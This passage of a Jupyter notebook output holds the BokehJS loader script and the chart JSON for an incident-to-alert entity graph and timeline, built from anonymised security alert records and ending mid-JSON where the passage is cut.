\"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2360\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2360\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"161010f6-3f0f-4ea7-a749-7b44d390299e\" data-root-id=\"2440\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"f6abf2b1-c950-4a4d-998e-5ea6704b3506\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"2300\"},{\"id\":\"2439\"}]},\"id\":\"2440\",\"type\":\"Column\"},{\"attributes\":{\"formatter\":{\"id\":\"2424\"},\"major_label_policy\":{\"id\":\"2466\"},\"ticker\":{\"id\":\"2419\"}},\"id\":\"2418\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2500\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"2408\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"2473\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2502\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"2503\",\"type\":\"YearsTicker\"},{\"attributes\":{\"graph_layout\":{\"Alert: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\":[-1.9469690120696694,0.5310440518641615],\"Alert: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\":[1.7351710795621333,0.4103910693711786],\"Alert: naebofkqlmonbrmloaonffmdjipln\":[-0.8091660289067765,-1.5326230084775512],\"Alert: qdbbijed\":[1.3510219801753547,-1.1983017055043368],\"Alert: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\":[-0.12134956862872744,1.5845752520659322],\"Incident: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\":[-2.0,0.7764033720909752],\"Incident: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\":[1.480968052039605,0.29687479118350246],\"Incident: naebofkqlmonbrmloaonffmdjipln\":[-0.8467501464094224,-1.2848918871788169],\"Incident: qdbbijed\":[1.265497392922371,-1.4331604253592427],\"Incident: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\":[-0.1084237486848678,1.8496884899441974]}},\"id\":\"2344\",\"type\":\"StaticLayoutProvider\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"2423\",\"type\":\"Title\"},{\"attributes\":{\"source\":{\"id\":\"2362\"}},\"id\":\"2406\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"2472\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"2337\"},\"glyph\":{\"id\":\"2345\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"2339\"}},\"id\":\"2338\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"end\":1633290524666.106,\"start\":1631718044666.106},\"id\":\"2410\",\"type\":\"Range1d\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2501\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"2337\"}},\"id\":\"2339\",\"type\":\"CDSView\"},{\"attributes\":{\"data\":{\"color\":[\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\"],\"description\":[\"2021-10-01T17:52:21.5763494Z - qdbbijed - lciaqlfodrimcjjcckdppidjrnoobqllnafe\",\"qdbbijed - ['alfojbqollofnjoiboaacndnkceqjmfbmrpq']\",\"2021-10-01T17:44:44.4768467Z - mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela - nmejajbiqrpqkqlbjqedrrqndlmrppldoibd\",\"mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela - ['ffrromboaamlmjmlmopefnldpbklbeqqirqm']\",\"2021-10-01T17:29:50.1999887Z - naebofkqlmonbrmloaonffmdjipln - ppffjqndimadciqjqqkakaabjabcfbilraeb\",\"naebofkqlmonbrmloaonffmdjipln - ['rlklbkeeqiekrkkjbkqfebkdcamjknpnparl']\",\"2021-10-01T16:52:35.8429041Z - qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp - dbkkfqcdnbciapjajpbdbimroidmfqljfmjd\",\"qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp - ['lfrdecrklremkcioileamdelqdiirmrrmlkp']\",\"2021-10-01T16:49:43.6929517Z - ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje - ppfnqmqlakpmqcnnnniofmjoomenilncrqfj\",\"ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje - ['aamkfdroimrrliaqkleppqkbijprdfmoecfe']\"],\"end_time\":[\"2021-10-01T16:01:48.872Z\",null,\"2021-10-01T15:09:54.128Z\",null,\"2021-10-01T17:24:44.6661059Z\",null,\"2021-10-01T16:11:23.6728107Z\",null,\"2021-10-01T16:44:38.190647Z\",null],\"entitytype\":[\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\"],\"index\":[\"Incident: qdbbijed\",\"Alert: qdbbijed\",\"Incident: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"Alert: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"Incident: naebofkqlmonbrmloaonffmdjipln\",\"Alert: naebofkqlmonbrmloaonffmdjipln\",\"Incident: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"Alert: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"Incident: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\",\"Alert: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\"],\"name\":[\"qdbbijed\",\"qdbbijed\",\"mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"naebofkqlmonbrmloaonffmdjipln\",\"naebofkqlmonbrmloaonffmdjipln\",\"qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\",\"ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\"],\"node_color\":[\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\",\"red\",\"orange\"],\"node_type\":[\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\",\"incident\",\"alert\"],\"source\":[null,\"{ 'AdditionalData': {'ID': 'alfojbqollofnjoiboaacndnkceqjmfbmrpq', 'Name': 'qdbbijed'},\\n  'DisplayName': 'qdbbijed',\\n  'SystemAlertIds': ['alfojbqollofnjoiboaacndnkceqjmfbmrpq'],\\n  'Type': 'alerts',\\n  'edges': set()}\",null,\"{ 'AdditionalData': { 'ID': 'ffrromboaamlmjmlmopefnldpbklbeqqirqm',\\n                      'Name': 'mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela'},\\n  'DisplayName': 'mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela',\\n  'SystemAlertIds': ['ffrromboaamlmjmlmopefnldpbklbeqqirqm'],\\n  'Type': 'alerts',\\n  'edges': set()}\",null,\"{ 'AdditionalData': { 'ID': 'rlklbkeeqiekrkkjbkqfebkdcamjknpnparl',\\n                      'Name': 'naebofkqlmonbrmloaonffmdjipln'},\\n  'DisplayName': 'naebofkqlmonbrmloaonffmdjipln',\\n  'SystemAlertIds': ['rlklbkeeqiekrkkjbkqfebkdcamjknpnparl'],\\n  'Type': 'alerts',\\n  'edges': set()}\",null,\"{ 'AdditionalData': { 'ID': 'lfrdecrklremkcioileamdelqdiirmrrmlkp',\\n                      'Name': 'qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp'},\\n  'DisplayName': 'qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp',\\n  'SystemAlertIds': ['lfrdecrklremkcioileamdelqdiirmrrmlkp'],\\n  'Type': 'alerts',\\n  'edges': set()}\",null,\"{ 'AdditionalData': { 'ID': 'aamkfdroimrrliaqkleppqkbijprdfmoecfe',\\n                      'Name': 'ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje'},\\n  'DisplayName': 'ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje',\\n  'SystemAlertIds': ['aamkfdroimrrliaqkleppqkbijprdfmoecfe'],\\n  'Type': 'alerts',\\n  'edges': set()}\"],\"start_time\":[\"2021-09-30T12:01:34.374Z\",null,\"2021-10-01T15:09:54.128Z\",null,\"2021-09-17T17:24:44.6661059Z\",null,\"2021-10-01T11:11:23.6728107Z\",null,\"2021-09-30T15:44:38.190647Z\",null],\"time_generated\":[\"2021-10-01T17:52:21.5763494Z\",null,\"2021-10-01T17:44:44.4768467Z\",null,\"2021-10-01T17:29:50.1999887Z\",null,\"2021-10-01T16:52:35.8429041Z\",null,\"2021-10-01T16:49:43.6929517Z\",null]},\"selected\":{\"id\":\"2468\"},\"selection_policy\":{\"id\":\"2469\"}},\"id\":\"2337\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"2387\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"2340\",\"type\":\"MultiLine\"},{\"attributes\":{\"data\":{\"end\":[\"Alert: qdbbijed\",\"Alert: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"Alert: naebofkqlmonbrmloaonffmdjipln\",\"Alert: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"Alert: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\"],\"start\":[\"Incident: qdbbijed\",\"Incident: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"Incident: naebofkqlmonbrmloaonffmdjipln\",\"Incident: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"Incident: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\"]},\"selected\":{\"id\":\"2470\"},\"selection_policy\":{\"id\":\"2471\"}},\"id\":\"2341\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"data_source\":{\"id\":\"2341\"},\"glyph\":{\"id\":\"2340\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"2343\"}},\"id\":\"2342\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"2437\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"text\":\"Alert: naebofkqlmonbrmloaonffmdjipln\",\"text_font_size\":\"10pt\",\"x\":-0.8091660289067765,\"x_offset\":5,\"y\":-1.5326230084775512,\"y_offset\":5},\"id\":\"2355\",\"type\":\"Label\"},{\"attributes\":{\"source\":{\"id\":\"2341\"}},\"id\":\"2343\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":\"Alert: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"text_font_size\":\"10pt\",\"x\":-0.12134956862872744,\"x_offset\":5,\"y\":1.5845752520659322,\"y_offset\":5},\"id\":\"2357\",\"type\":\"Label\"},{\"attributes\":{\"text\":\"Alert: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"text_font_size\":\"10pt\",\"x\":1.7351710795621333,\"x_offset\":5,\"y\":0.4103910693711786,\"y_offset\":5},\"id\":\"2353\",\"type\":\"Label\"},{\"attributes\":{\"text\":\"Alert: qdbbijed\",\"text_font_size\":\"10pt\",\"x\":1.3510219801753547,\"x_offset\":5,\"y\":-1.1983017055043368,\"y_offset\":5},\"id\":\"2351\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"2474\",\"type\":\"Selection\"},{\"attributes\":{\"text\":\"Incident: mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"text_font_size\":\"10pt\",\"x\":1.480968052039605,\"x_offset\":5,\"y\":0.29687479118350246,\"y_offset\":5},\"id\":\"2352\",\"type\":\"Label\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"2305\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"2466\",\"type\":\"AllLabels\"},{\"attributes\":{\"text\":\"Incident: qdbbijed\",\"text_font_size\":\"10pt\",\"x\":1.265497392922371,\"x_offset\":5,\"y\":-1.4331604253592427,\"y_offset\":5},\"id\":\"2350\",\"type\":\"Label\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"field\":\"node_color\"},\"size\":{\"value\":25}},\"id\":\"2345\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"2475\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"text\":\"Incident: naebofkqlmonbrmloaonffmdjipln\",\"text_font_size\":\"10pt\",\"x\":-0.8467501464094224,\"x_offset\":5,\"y\":-1.2848918871788169,\"y_offset\":5},\"id\":\"2354\",\"type\":\"Label\"},{\"attributes\":{\"text\":\"Incident: qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"text_font_size\":\"10pt\",\"x\":-0.1084237486848678,\"x_offset\":5,\"y\":1.8496884899441974,\"y_offset\":5},\"id\":\"2356\",\"type\":\"Label\"},{\"attributes\":{\"text\":\"Incident: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\",\"text_font_size\":\"10pt\",\"x\":-2.0,\"x_offset\":5,\"y\":0.7764033720909752,\"y_offset\":5},\"id\":\"2358\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"2324\",\"type\":\"HelpTool\"},{\"attributes\":{\"formatter\":{\"id\":\"2443\"},\"major_label_policy\":{\"id\":\"2442\"},\"ticker\":{\"id\":\"2316\"}},\"id\":\"2315\",\"type\":\"LinearAxis\"},{\"attributes\":{\"text\":\"Alert: ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\",\"text_font_size\":\"10pt\",\"x\":-1.9469690120696694,\"x_offset\":5,\"y\":0.5310440518641615,\"y_offset\":5},\"id\":\"2359\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"2307\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2309\",\"type\":\"LinearScale\"},{\"attributes\":{\"text\":\"Alert Entity graph\"},\"id\":\"2301\",\"type\":\"Title\"},{\"attributes\":{\"data\":{\"Center\":{\"__ndarray__\":\"AHBfX5nDd0IAAGV5xsN3Qq6hX2iNwXdC9ozlaMHDd0Ja6sb6oMN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"Description\":[\"2021-10-01T17:52:21.5763494Z - qdbbijed - lciaqlfodrimcjjcckdppidjrnoobqllnafe\",\"2021-10-01T17:44:44.4768467Z - mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela - nmejajbiqrpqkqlbjqedrrqndlmrppldoibd\",\"2021-10-01T17:29:50.1999887Z - naebofkqlmonbrmloaonffmdjipln - ppffjqndimadciqjqqkakaabjabcfbilraeb\",\"2021-10-01T16:52:35.8429041Z - qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp - dbkkfqcdnbciapjajpbdbimroidmfqljfmjd\",\"2021-10-01T16:49:43.6929517Z - ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje - ppfnqmqlakpmqcnnnniofmjoomenilncrqfj\"],\"EndTime\":{\"__ndarray__\":\"AIDUccnDd0IAAGV5xsN3Qq6hnzDOw3dC9owp/snDd0Ja6hrly8N3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"Name\":[\"qdbbijed\",\"mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"naebofkqlmonbrmloaonffmdjipln\",\"qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\"],\"Row\":[3,1,2,4,0],\"StartTime\":{\"__ndarray__\":\"AGDqTGnDd0IAAGV5xsN3Qq6hH6BMv3dC9oyh07jDd0Ja6nIQdsN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"TimeGenerated\":{\"__ndarray__\":\"loUkxc/Dd0KJzYtVz8N3Qs9/N3vOw3dCdy64WczDd0I3z7AvzMN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"Type\":[\"incident\",\"incident\",\"incident\",\"incident\",\"incident\"],\"Width\":{\"__ndarray__\":\"AAAAiDoJmEEAAAAAAAAAAAAAAABCBtJBAAAAAIgqcUEAAAAAKnWVQQ==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"end_time\":{\"__ndarray__\":\"AIDUccnDd0IAAGV5xsN3Qq6hnzDOw3dC9owp/snDd0Ja6hrly8N3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"index\":[0,1,2,3,4],\"start_time\":{\"__ndarray__\":\"AGDqTGnDd0IAAGV5xsN3Qq6hH6BMv3dC9oyh07jDd0Ja6nIQdsN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]}},\"selected\":{\"id\":\"2474\"},\"selection_policy\":{\"id\":\"2475\"}},\"id\":\"2362\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"2303\",\"type\":\"Range1d\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2493\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"2456\"},\"major_label_policy\":{\"id\":\"2455\"},\"ticker\":{\"id\":\"2312\"}},\"id\":\"2311\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"2312\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"2311\"},\"ticker\":null},\"id\":\"2314\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2412\",\"type\":\"DataRange1d\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2477\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"below\":[{\"id\":\"2418\"},{\"id\":\"2423\"}],\"center\":[{\"id\":\"2421\"}],\"height\":120,\"renderers\":[{\"id\":\"2430\"}],\"title\":{\"id\":\"2408\"},\"toolbar\":{\"id\":\"2422\"},\"toolbar_location\":null,\"width\":800,\"x_range\":{\"id\":\"2410\"},\"x_scale\":{\"id\":\"2414\"},\"y_range\":{\"id\":\"2412\"},\"y_scale\":{\"id\":\"2416\"}},\"id\":\"2407\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2478\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"2414\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2416\",\"type\":\"LinearScale\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2480\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis\":{\"id\":\"2315\"},\"dimension\":1,\"ticker\":null},\"id\":\"2318\",\"type\":\"Grid\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2479\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"2316\",\"type\":\"BasicTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2484\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"2492\"},{\"id\":\"2493\"},{\"id\":\"2494\"},{\"id\":\"2495\"},{\"id\":\"2496\"},{\"id\":\"2497\"},{\"id\":\"2498\"},{\"id\":\"2499\"},{\"id\":\"2500\"},{\"id\":\"2501\"},{\"id\":\"2502\"},{\"id\":\"2503\"}]},\"id\":\"2419\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2485\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"2319\"},{\"id\":\"2320\"},{\"id\":\"2321\"},{\"id\":\"2322\"},{\"id\":\"2323\"},{\"id\":\"2324\"},{\"id\":\"2333\"}]},\"id\":\"2326\",\"type\":\"Toolbar\"},{\"attributes\":{\"axis\":{\"id\":\"2418\"},\"ticker\":null},\"id\":\"2421\",\"type\":\"Grid\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2481\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2320\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"2468\",\"type\":\"Selection\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2483\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2319\",\"type\":\"PanTool\"},{\"attributes\":{\"active_multi\":{\"id\":\"2432\"},\"tools\":[{\"id\":\"2432\"}]},\"id\":\"2422\",\"type\":\"Toolbar\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2487\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"2325\"}},\"id\":\"2321\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"2469\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2482\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2322\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"2488\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"2323\",\"type\":\"ResetTool\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2486\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"2455\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"2470\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"2456\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"2471\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"2433\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"2489\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"2490\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"2325\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"days\":[\"%m-%d 